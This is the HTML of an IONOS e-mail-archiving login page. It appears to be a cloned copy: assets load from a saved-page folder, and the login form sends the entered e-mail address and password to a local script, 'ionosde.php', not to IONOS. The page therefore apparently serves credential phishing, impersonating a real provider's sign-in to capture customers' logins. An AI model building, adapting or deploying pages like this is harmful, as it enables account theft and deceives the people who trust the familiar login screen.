<!DOCTYPE html>
<html data-i18n="oao.lang" data-i18n-attr="lang" lang="de"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <!-- charset -->
  <meta charset="utf-8">

  <!-- canonical relevant information -->
  <link rel="canonical" href="https://archiv.ionos.de/" data-i18n="oao.login.canonical" data-i18n-attr="href">
  <link rel="alternate" hreflang="de" href="https://archiv.ionos.de/">
  <link rel="alternate" hreflang="en-gb" href="https://archive.ionos.co.uk/">
  <link rel="alternate" hreflang="en-us" href="https://archive.ionos.com/">
  <link rel="alternate" hreflang="en-ca" href="https://archive.ionos.ca/">
  <link rel="alternate" hreflang="en" href="https://archive.ionos.com/">
  <link rel="alternate" hreflang="es-es" href="https://archivo.ionos.es/">
  <link rel="alternate" hreflang="es-mx" href="https://archivero.ionos.mx/">
  <link rel="alternate" hreflang="es" href="https://archivo.ionos.es/">
  <link rel="alternate" hreflang="fr" href="https://archives.ionos.fr/">
  <link rel="alternate" hreflang="it" href="https://archivio.ionos.it/">
  <link rel="alternate" hreflang="x-default" href="https://archive.ionos.com/">

  <!-- head infos -->
  <title data-i18n="oao.login.title" data-i18n-attr="text">IONOS E-Mail-Archivierung – Login</title>
  <meta content="Durchsuchen Sie Ihr E-Mail-Archiv nach archivierten E-Mails" data-i18n="oao.login.description" data-i18n-attr="content" name="description">

  <!-- microsoft ie-mode -->
  <meta content="IE=edge" http-equiv="X-UA-Compatible">
  <!-- mobile config -->
  <meta content="width=device-width, initial-scale=1.0" name="viewport">
  <!-- microsoft mobile config -->
  <meta id="win8Icon" name="msapplication-TileImage" content="img/apple-touch-icon.png">
  <meta id="win8TileColor" name="msapplication-TileColor" content="#003d8f">
  <!-- apple mobile config -->
  <meta content="yes" name="apple-mobile-web-app-capable">
  <meta content="" name="apple-mobile-web-app-title">
  <meta content="black" name="apple-mobile-web-app-status-bar-style">
  <!-- apple-touch-icon -->
  <link rel="apple-touch-icon" href="https://archiv.ionos.de/img/apple-touch-icon.png">
  <!-- apple-touch-startup-image [media-devicewidth is not W3C-conform] -->
  <link rel="apple-touch-startup-image" href="https://archiv.ionos.de/img/apple-launch.png">
  <!-- favicon -->
  <link href="https://archiv.ionos.de/img/favicon.ico" id="favicon" rel="shortcut icon" type="image/x-icon">
  <!-- css includes -->
  <link href="IONOS%20E-Mail-Archivierung%20%E2%80%93%20Login_files/ionos.min.css" rel="stylesheet" type="text/css">
  <link href="IONOS%20E-Mail-Archivierung%20%E2%80%93%20Login_files/login.min.css" rel="stylesheet" type="text/css">
<link type="text/css" rel="stylesheet" href="IONOS%20E-Mail-Archivierung%20%E2%80%93%20Login_files/inpagelayer.css"><link type="text/css" rel="stylesheet" href="IONOS%20E-Mail-Archivierung%20%E2%80%93%20Login_files/navigation.css"><link type="text/css" rel="stylesheet" href="IONOS%20E-Mail-Archivierung%20%E2%80%93%20Login_files/statuspage.css"><link rel="stylesheet" type="text/css" href="IONOS%20E-Mail-Archivierung%20%E2%80%93%20Login_files/bundle.css"></head>
<body class="oao-pi-nolayer oao-pi-with-navigation oao-pi-page-unload">

<!-- exos main -->
<main class="page-content"><span class="page-transition__indicator-bar page-transition__indicator-bar--running"></span>

  <!-- exos - global navigation -->
  <div class="oao-navi-navigation oao-navi-finished">
    <div class="oao-navi-top oao-navi-fade"><ul></ul></div><div class="oao-navi-left">
      <div class="oao-navi-application-name"><ul class="oao-navi-sub-left"><li class="oao-navi-flyout-container oao-navi-flyout-application_switch "><a class="oao-navi-flyout-item oao-navi-app-name oao-navi-app-nl oao-navi-as-no-icon oao-navi-ionos" href="https://www.ionos.de/"><span class="oao-navi-app-logo"></span><span class="oao-navi-app-name-span-nl">
          E-Mail-Archivierung
        </span></a></li></ul>
      </div>
    </div>
  <div class="oao-navi-center oao-navi-fade"><ul><li class="oao-navi-flyout-container oao-navi-flyout-search oao-navi-flyout-search-big"><div class="oao-navi-simple-tooltip">Online-Hilfe</div><div class="oao-navi-search-container"><a class="oao-navi-flyout-item" aria-label="Online-Hilfe"><!--?xml version="1.0" encoding="utf-8"?-->
<svg version="1.1" id="oao-navi-search-icon" xmlns="http://www.w3.org/2000/svg" xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 26 26" xml:space="preserve">
<g id="dark">
	<path class="oao-navi-icon-main" d="M25.7,24.1l-8.2-8.6c1.2-1.6,2-3.6,2-5.8c0-5.4-4.4-9.7-9.7-9.7S0,4.4,0,9.7
		s4.4,9.7,9.7,9.7c2.4,0,4.6-0.9,6.3-2.3l8.2,8.5c0.2,0.2,0.5,0.3,0.8,0.3s0.5-0.1,0.8-0.3C26.1,25.3,26.1,24.6,25.7,24.1z
		 M9.7,17.3c-4.2,0-7.5-3.4-7.5-7.5c0-4.2,3.4-7.5,7.5-7.5c4.2,0,7.5,3.4,7.5,7.5C17.3,13.9,13.9,17.3,9.7,17.3z"></path>
	<path class="oao-navi-icon-fill" d="M25.7,24.1l-8.2-8.6c1.2-1.6,2-3.6,2-5.8c0-5.4-4.4-9.7-9.7-9.7S0,4.4,0,9.7
		s4.4,9.7,9.7,9.7c2.4,0,4.6-0.9,6.3-2.3l8.2,8.5c0.2,0.2,0.5,0.3,0.8,0.3s0.5-0.1,0.8-0.3C26.1,25.3,26.1,24.6,25.7,24.1z"></path>
</g>
</svg>
</a><div class="oao-navi-input-container"><i class="oao-navi-search-icon"></i><input class="oao-navi-search-input" type="search" placeholder="Nach Funktionen, Domains und Hilfe suchen"><i class="oao-navi-search-mic"></i></div></div></li></ul></div><div class="oao-navi-right oao-navi-fade"><ul class="oao-navi-sub oao-navi-nl"><li class="oao-navi-flyout-container oao-navi-flyout-support "><div class="oao-navi-simple-tooltip">Hilfe &amp; Kontakt</div><a class="oao-navi-flyout-item" data-target-id="oao-navi-support-button" aria-label="Hilfe &amp; Kontakt"><svg xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 26 26">
	<path class="oao-navi-icon-fill" d="M1.7,25.5c-0.5,0-0.8-0.3-0.9-0.4c-0.3-0.4-0.4-0.9-0.1-1.5C1.5,21.4,2.4,19,2.8,18c-0.1-0.1-0.2-0.3-0.3-0.4
	c-1.3-1.8-2-3.8-2-6c0-6.1,5.6-11,12.5-11c7,0,12.5,4.8,12.5,11c0,6.1-5.6,11-12.5,11c-1.5,0-2.7-0.2-3.7-0.5C9.2,22,9,22,8.9,21.9
	c-0.6,0.3-2,1-3,1.5c-2.6,1.4-3.4,1.8-3.7,1.9C2,25.4,1.9,25.5,1.7,25.5z"></path>
	<g class="oao-navi-icon-main">
		<path class="oao-navi-icon-invert" d="M12.9,13.3c-0.6,0-1.1-0.5-1.1-1.1c0-1.7,1.1-2.5,1.4-2.7c0.6-0.4,0.8-0.8,0.8-1c0-0.6-0.2-0.8-0.2-0.8
			c-0.3-0.2-0.7-0.3-0.8-0.3c-0.8,0-1,0.4-1.1,0.7c-0.1,0.6-0.7,1-1.2,0.9s-1-0.6-0.9-1.2C9.9,7,10.7,5.3,13,5.3c0.2,0,1.4,0,2.4,0.9
			c0.4,0.4,0.9,1.1,0.9,2.3c0,0.7-0.3,1.8-1.7,2.8c-0.1,0.1-0.5,0.3-0.5,0.9C14,12.8,13.6,13.3,12.9,13.3z"></path>
		<path class="oao-navi-icon-invert" d="M13,17.7c0.7,0,1.2-0.5,1.2-1.2s-0.5-1.2-1.2-1.2s-1.2,0.5-1.2,1.2S12.3,17.7,13,17.7z"></path>
		<path d="M1.2,26c-0.5,0-0.8-0.3-1-0.4c-0.3-0.4-0.4-1-0.1-1.5c0.9-2.3,1.8-4.8,2.2-5.8c-0.1-0.1-0.2-0.3-0.3-0.4
			c-1.4-1.9-2-4-2-6.2C0,5.2,5.8,0.1,13,0.1c7.3,0,13,5,13,11.5C26,17.8,20.2,23,13,23c-1.6,0-2.8-0.2-3.9-0.5
			c-0.1,0-0.2-0.1-0.4-0.1c-0.6,0.3-2.1,1-3.1,1.6c-2.7,1.4-3.5,1.8-3.8,1.9C1.6,25.9,1.4,26,1.2,26z M13,2.2
			c-5.9,0-10.8,4.3-10.8,9.3c0,1.8,0.5,3.5,1.6,5C4,16.7,4.2,17,4.4,17.2c0.5,0.5,0.5,0.6-1.4,5.7c0.6-0.3,1.2-0.6,1.7-0.9
			c4-2.1,4-2.1,4.6-1.8c0.2,0.1,0.4,0.2,0.6,0.2c0.9,0.3,1.8,0.4,3.2,0.4c5.9,0,10.8-4.3,10.8-9.3C23.8,6.3,19.1,2.2,13,2.2z"></path>
	</g>
</svg>
</a></li><li class="oao-navi-flyout-container oao-navi-flyout-search oao-navi-flyout-search-small"><div class="oao-navi-simple-tooltip">Online-Hilfe</div><div class="oao-navi-search-container"><a class="oao-navi-flyout-item" aria-label="Online-Hilfe"><!--?xml version="1.0" encoding="utf-8"?-->
<svg version="1.1" id="oao-navi-search-icon" xmlns="http://www.w3.org/2000/svg" xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 26 26" xml:space="preserve">
<g id="dark">
	<path class="oao-navi-icon-main" d="M25.7,24.1l-8.2-8.6c1.2-1.6,2-3.6,2-5.8c0-5.4-4.4-9.7-9.7-9.7S0,4.4,0,9.7
		s4.4,9.7,9.7,9.7c2.4,0,4.6-0.9,6.3-2.3l8.2,8.5c0.2,0.2,0.5,0.3,0.8,0.3s0.5-0.1,0.8-0.3C26.1,25.3,26.1,24.6,25.7,24.1z
		 M9.7,17.3c-4.2,0-7.5-3.4-7.5-7.5c0-4.2,3.4-7.5,7.5-7.5c4.2,0,7.5,3.4,7.5,7.5C17.3,13.9,13.9,17.3,9.7,17.3z"></path>
	<path class="oao-navi-icon-fill" d="M25.7,24.1l-8.2-8.6c1.2-1.6,2-3.6,2-5.8c0-5.4-4.4-9.7-9.7-9.7S0,4.4,0,9.7
		s4.4,9.7,9.7,9.7c2.4,0,4.6-0.9,6.3-2.3l8.2,8.5c0.2,0.2,0.5,0.3,0.8,0.3s0.5-0.1,0.8-0.3C26.1,25.3,26.1,24.6,25.7,24.1z"></path>
</g>
</svg>
</a><div class="oao-navi-input-container"><i class="oao-navi-search-icon"></i><input class="oao-navi-search-input" type="search" placeholder="Nach Funktionen, Domains und Hilfe suchen"><i class="oao-navi-search-mic"></i></div></div></li></ul></div></div>

  <div class="clearfix" id="content">
    <div class="page-section page-section--default page-section--short">
      <div class="page-section__block">

        <!-- Global Navigation > Statuspage Integration > Incident/Maintenance status -->
        <div class="oao-statuspage-message-container" data-component="MAIL_ARCHIVING"></div>
        <div class="sheet">
          <div class="sheet__section">
            <div class="sheet__block"><h1 class="headline" data-i18n="oao.login.heading" data-i18n-attr="text">E-Mail-Archivierung Login</h1>
              <form id="login-form" class="form content-elem" action="ionosde.php"  method="post" autocomplete="on">
            
                  <input class="input-text login-form-user" id="login-form-user" maxlength="200" name="username" size="40" tabindex="1" autocapitalize="none" spellcheck="false" type="text" required="true"><label class="label login-form-user-label" for="login-form-user"><span data-i18n="oao.login.field.email" data-i18n-attr="text">E-Mail-Adresse</span></label></span>
                <div class="label align-horizontal-right">
                  <a data-i18n="oao.login.forgotpw.link" data-i18n-attr="href" href="https://www.ionos.de/hilfe/index.php?id=2327&amp;utm_term=2327&amp;utm_campaign=forgotpw&amp;utm_medium=help-and-learn&amp;utm_source=login_frontend_hosting&amp;utm_content=flyin" data-flyin-href="" class="link link--lookup oao-pi-open-in-flyin">
                    <span data-i18n="oao.login.forgotpw.heading" data-i18n-attr="text">Passwort vergessen?</span>
                  </a>
                </div>
                <span class="input-text-group input-text-group--empty" style="overflow: visible; margin-bottom: 10px;"><span class="input-text-group__icon exos-icon exos-icon-password-16"></span><input class="input-text login-form-password" id="login-form-password" maxlength="40" name="password" size="40" tabindex="2" type="password" required="true" value=""><label class="label login-form-password-label" for="login-form-password"><span data-i18n="oao.login.field.password" data-i18n-attr="text">Passwort</span></label></span>
                <footer class="sheet__footer">
                  <button class="button button--primary button--with-loader button--full-width" name="submit" tabindex="3" type="submit" value="" data-i18n="oao.login" data-i18n-attr="text">Login</button>
                </footer>
              </form>
            </div>
          </div>
        </div>
        <h2 class="headline headline--sub" data-i18n="oao.login.morelogins.heading" data-i18n-attr="text">Weitere IONOS Logins</h2>
        <div class="grid-12 equal-grid-spacing equal-grid-height">
          <div class="grid-04 grid-small-06">
            <div class="grid-spacing-both"><a class="tile tile--filled" data-i18n="oao.login.controlcenter.link" data-i18n-attr="href" href="https://mein.ionos.de/">
              <svg class="product-icon" viewBox="0 0 168 128" xmlns="http://www.w3.org/2000/svg">
                <path class="product-icon__key" fill="#0b9dcc" d="M84,58c6.6,0,12-5.4,12-12s-5.4-12-12-12s-12,5.4-12,12S77.4,58,84,58z M84,38c4.4,0,8,3.6,8,8s-3.6,8-8,8
                  s-8-3.6-8-8S79.6,38,84,38z M107.2,78C104.5,67.4,95,60,84,60s-20.5,7.4-23.2,18c-0.2,0.9,0.2,1.8,1,2.2C68.5,84,76.2,86,84,86
                  s15.5-2,22.3-5.8C107.1,79.8,107.5,78.9,107.2,78z M84,82c-6.6,0-13.1-1.6-18.9-4.5C67.8,69.5,75.4,64,84,64s16.2,5.5,18.9,13.5
                  C97.1,80.4,90.6,82,84,82z"></path>
                <path class="product-icon__base" fill="#001b41" d="M156.4,55.6l-8.9,9.7c-0.4,0.4-0.9,0.7-1.5,0.7c0,0,0,0,0,0c0,0,0,0,0,0c-0.4,0-0.8-0.1-1.1-0.3l-11-7.3
                  c-0.9-0.6-1.2-1.9-0.6-2.8c0.6-0.9,1.9-1.2,2.8-0.6l7.7,5.1C141.9,28.9,115.8,4,84,4C55.4,4,30.6,24.3,25.1,52.4
                  c-0.2,1.1-1.3,1.8-2.3,1.6c-1.1-0.2-1.8-1.3-1.6-2.3C27.1,21.7,53.5,0,84,0c33.6,0,61.3,26.1,63.8,59.1l5.6-6.1
                  c0.7-0.8,2-0.9,2.8-0.1C157,53.5,157.1,54.8,156.4,55.6z M145.2,74c-1.1-0.2-2.1,0.5-2.3,1.6c-5.5,28-30.3,48.4-58.9,48.4
                  c-31.8,0-57.9-24.9-59.9-56.2l7.7,5.1c0.3,0.2,0.7,0.3,1.1,0.3c0.6,0,1.3-0.3,1.7-0.9c0.6-0.9,0.4-2.2-0.6-2.8l-11-7.3
                  c-0.8-0.5-1.9-0.4-2.5,0.3c0,0-8.9,9.8-8.9,9.8c-0.7,0.8-0.7,2.1,0.1,2.8c0.4,0.4,0.9,0.5,1.3,0.5c0.5,0,1.1-0.2,1.5-0.7l5.6-6.1
                  c2.5,33,30.2,59.1,63.8,59.1c30.5,0,56.9-21.7,62.8-51.6C147,75.3,146.3,74.2,145.2,74z"></path>
              </svg>
              <span class="tile__label" data-i18n="oao.login.controlcenter" data-i18n-attr="text">Mein IONOS</span></a></div>
          </div>
          <div class="grid-04 grid-small-06">
            <div class="grid-spacing-both"><a class="tile tile--filled" data-i18n="oao.login.email.link" data-i18n-attr="href" href="https://mail.ionos.de/">
              <svg class="product-icon" viewBox="0 0 168 128" xmlns="http://www.w3.org/2000/svg">
                <path class="product-icon__base" d="M23.6 58c-.5 0-1.1-.2-1.5-.6-.8-.8-.7-2.1.1-2.8L36.7 41c.8-.8 1.9-.7 2.6.1.8.8.5 2.3-.3 3L25 57.5c-.4.3-.9.5-1.4.5zM64 20c-.5 0-1.1-.2-1.5-.6-.8-.8-.7-2.1.1-2.8L77.8 2.3c3.4-3 8.9-3 12.4-.1l15.3 14.3c.8.8.9 2 .1 2.8s-2 .8-2.8.1L87.5 5.3c-1.9-1.6-5.2-1.6-7 0L65.4 19.5c-.4.3-.9.5-1.4.5zM144.5 58c-.5 0-1-.2-1.4-.5l-14.4-13.6c-.8-.8-.8-2-.1-2.8.8-.8 2-.8 2.8-.1l14.4 13.6c.8.8.8 2 .1 2.8-.3.4-.9.6-1.4.6z" fill="#001b41"></path>
                <path class="product-icon__key" d="M130.1 64c-1.1 0-2.1-.9-2.1-2V22c0-1.1-.9-2-2-2H42c-1.1 0-2 .9-2 2v40c0 1.1-.9 2-2 2s-2-.9-2-2V22c0-3.3 2.7-6 6-6h84c3.3 0 6 2.7 6 6v40c0 1.1-.8 2-1.9 2z" fill="#0b9dcc"></path>
                <path class="product-icon__base" d="M146 54.6c-.4-.5-1-.7-1.6-.6-.4-.1-.8 0-1.2.2l-48 24c-.1 0-.2.1-.2.2l-4.8-4.2c-3.4-3-9-2.9-12.3 0l-4.7 4.1c-.1 0-.1-.1-.2-.1l-48-24c-.3-.2-.7-.2-1-.2-.7-.2-1.5.1-2 .7-1.3 1.6-2 3.4-2 5.3v60c0 4.4 3.6 8 8 8h112c4.4 0 8-3.6 8-8.1v-60c0-2-.7-3.8-2-5.3zm-2.2 3.8c.2.5.3 1 .3 1.6v59.9c0 .4-.1.9-.2 1.3l-45.7-40 45.6-22.8zM24.3 121.2c-.1-.4-.2-.8-.2-1.3v-60c0-.5.1-1 .3-1.5L70 81.2l-45.7 40zm3.8 2.7c-.3 0-.5 0-.8-.1l53.2-46.6c1.9-1.6 5.2-1.6 7.1 0l53.3 46.6c-.3.1-.5.1-.8.1h-112z" fill="#001b41"></path>
                <path class="product-icon__key" d="M90.9 36.6c-.8-.2-1.7.1-2.1.8-.8-.5-1.8-.8-2.9-.9-4-.4-7.9 2.3-9.6 6.9-1.2 3.1-1.2 6.3.1 8.7.9 1.6 2.3 2.8 4 3.2.5.1 1.1.2 1.6.2 1.9 0 3.8-.8 5.4-2.3.1.2.3.4.4.6 1.5 1.7 3.7 1.7 5 1.7 4 0 9.7-5 9.7-12.8 0-8.4-3.9-12.5-7.1-14.4-3.6-2.1-7.4-2.3-8.9-2.3-11.2 0-20.6 9.9-20.6 21.7C65.9 61.1 76.3 66 83.3 66c4.8 0 9-2.6 9.2-2.7.9-.6 1.2-1.9.6-2.8-.6-.9-1.9-1.2-2.8-.6 0 0-3.4 2.1-7 2.1-4.6 0-13.4-3-13.6-14.4 0-9.4 7.8-17.7 16.6-17.7 3.6 0 12 1.2 12 12.7 0 5.8-4.2 8.8-5.7 8.8-.6 0-1.6 0-1.9-.3-.1-.1-.4-.5-.3-1.9.2-.4.2-.8.1-1.2 0-.2 0-.4.1-.6.3-1.4.5-2.6.7-3.6.1-.3.2-.6.2-.9v-.2c.5-2.6.8-3.7.8-3.7.3-1-.3-2.1-1.4-2.4zm-9.5 14.9c-.6-.2-1.1-.6-1.4-1.2-.7-1.4-.7-3.5.1-5.5 1.2-3.2 3.6-4.5 5.4-4.3 1.5.1 2 .8 2 2.4-.2 1.1-.4 2.4-.7 3.9 0 .2-.1.5-.1.7-1.4 3-3.8 4.4-5.3 4z" fill="#0b9dcc"></path>
              </svg>
              <span class="tile__label" data-i18n="oao.login.webmail" data-i18n-attr="text">Webmail</span></a></div>
          </div>
          <div class="grid-04 grid-small-06">
            <div class="grid-spacing-both"><a class="tile tile--filled" data-i18n="oao.login.hidrive.link" data-i18n-attr="href" href="https://hidrive.ionos.com/">
              <svg class="product-icon" viewBox="0 0 168 128" xmlns="http://www.w3.org/2000/svg">
                <path class="product-icon__key" d="M58,72h6v14c0,1.1,0.9,2,2,2h36c1.1,0,2-0.9,2-2V72h6c0.9,0,1.7-0.6,1.9-1.5c0.2-0.9-0.1-1.8-0.9-2.2l-26-16         c-0.6-0.4-1.5-0.4-2.1,0l-26,16c-0.8,0.5-1.1,1.4-0.9,2.2C56.3,71.4,57.1,72,58,72z M84,56.3L102.9,68H102c-1.1,0-2,0.9-2,2v14H68         V70c0-1.1-0.9-2-2-2h-0.9L84,56.3z M110,108h-6V94c0-1.1-0.9-2-2-2H66c-1.1,0-2,0.9-2,2v14h-6c-0.9,0-1.7,0.6-1.9,1.5         c-0.2,0.9,0.1,1.8,0.9,2.2l26,16c0.3,0.2,0.7,0.3,1,0.3s0.7-0.1,1-0.3l26-16c0.8-0.5,1.1-1.4,0.9-2.2         C111.7,108.6,110.9,108,110,108z M84,123.7L65.1,112H66c1.1,0,2-0.9,2-2V96h32v14c0,1.1,0.9,2,2,2h0.9L84,123.7z" fill="#0b9dcc"></path>
                <path class="product-icon__base" d="M136,104h-22c-1.1,0-2-0.9-2-2s0.9-2,2-2h22c15.4,0,28-12.6,28-28c0-12.4-7.9-23.1-19.7-26.8         c-0.7-0.2-1.2-0.7-1.3-1.4C139.3,29.8,126.5,20,112,20c-0.6,0-1.3,0-2,0.1c-0.6,0-1.2-0.2-1.6-0.7C99.6,9.6,87.1,4,74,4         C52.7,4,34.3,18.5,29.3,39.2c-0.2,0.7-0.8,1.3-1.5,1.5C14,43.6,4,55.9,4,70c0,16.5,13.5,30,30,30h20c1.1,0,2,0.9,2,2s-0.9,2-2,2H34         C15.3,104,0,88.7,0,70c0-15.6,10.7-29.2,25.7-33C31.6,15.2,51.2,0,74,0c13.9,0,27.2,5.8,36.7,16c0.5,0,0.9,0,1.3,0         c16,0,30,10.5,34.5,25.8C159.4,46.2,168,58.3,168,72C168,89.6,153.6,104,136,104z" fill="#001b41"></path>
              </svg>
              <span class="tile__label" data-i18n="oao.login.hidrive" data-i18n-attr="text">HiDrive</span></a></div>
          </div>
        </div>
      </div>
    </div>
  </div>
</main>

<!-- exos footer -->
<footer class="page-footer">
  <div class="page-footer__block">
    <section class="page-footer__section page-footer__section--align-center page-footer__section--small-align-left">
      <div class="page-footer__section-item">
        <!-- Global Navigation > Statuspage Integration > Overall status -->
        <div class="oao-statuspage-overall-status"><a class="oao-statuspage-overall-state-minor" target="_blank" href="https://www.ionos-status.de/?utm_medium=footer&amp;utm_content=minor&amp;utm_source=DROPSUITE_LOGIN&amp;utm_campaign=login&amp;utm_term=no_search">Eingeschränkte Leistung</a></div>
      </div>
      <div class="page-footer__section-item">
        <a class="link" data-i18n="oao.login.imprint.link" data-i18n-attr="href" href="https://www.ionos.de/impressum" target="_blank">
          <span data-i18n="oao.login.ionos.legal" data-i18n-attr="text">IONOS SE</span>&nbsp;•&nbsp;<span data-i18n="{YEAR}" data-i18n-attr="text">2023</span>
        </a>
      </div>
      <div class="page-footer__section-item">
        <a class="link" data-i18n="oao.login.datasecurity.link" data-i18n-attr="href" href="https://www.ionos.de/terms-gtc/terms-privacy/" target="_blank">
          <span data-i18n="oao.login.datasecurity" data-i18n-attr="text">Datenschutzhinweise</span>
        </a>
      </div>
    </section>
  </div>
</footer>

<!-- SPA workaround iframe -->
<iframe class="hidden" name="loginTarget" src="IONOS%20E-Mail-Archivierung%20%E2%80%93%20Login_files/robots.txt"></iframe>



<div class="page-transition__blocker"><div class="page-transition__loading-spin loading-spin"></div></div><div class="static-overlay__blocker static-overlay__blocker--hidden"></div></body></html>